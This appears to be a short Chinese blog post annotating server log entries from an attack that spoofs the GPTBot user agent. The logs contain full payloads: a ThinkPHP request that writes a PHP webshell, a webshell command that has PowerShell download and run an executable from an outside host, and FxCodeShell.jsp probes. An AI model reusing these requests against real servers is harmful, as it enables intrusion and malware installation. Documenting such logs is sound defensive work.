嘗試注入 php後門程式
20.171.207.237 - - [06/Jun/2025:17:21:17 +0800] "GET /public/index.php?function=call_user_func_array&s=%2Findex%2F%5C%5Cthink%5C%5Capp%2Finvokefunction&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo+%5E%3C%3Fphp+%24action+%3D+%24_GET%5B%27xcmd%27%5D%3Bsystem%28%24action%29%3B%3F%5E%3E%3Ehydra.php HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
利用前面的後門下載並執行惡意軟體
20.171.207.237 - - [06/Jun/2025:17:21:19 +0800] "GET /public/hydra.php?xcmd=cmd.exe+%2Fc+powershell+%28new-object+System.Net.WebClient%29.DownloadFile%28%27http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe%27%2C%27%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe%27%29%3Bstart+%25SystemRoot%25%2FTemp%2Fxfxrucjwcznptjk12592.exe HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
執行 FxCodeShell.jsp測試伺服器點
20.171.207.237 - - [06/Jun/2025:17:23:20 +0800] "GET /FxCodeShell.jsp?address=http%3A%2F%2Ffid.hognoob.se%2Fdownload.exe&os=1&view=FxxkMyLie1836710Aa HTTP/1.1" 403 224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:23 +0800] "GET /FxCodeShell.jsp::$DATA HTTP/1.1" 403 231 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:26 +0800] "GET /FxCodeShell.jsp/ HTTP/1.1" 404 214 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.237 - - [06/Jun/2025:17:23:29 +0800] "GET /FxCodeShell.jsp%20 HTTP/1.1" 403 225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
最主要還是偽造 OpenAI, GPTbot的 User-Agent
"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
沒有留言:
張貼留言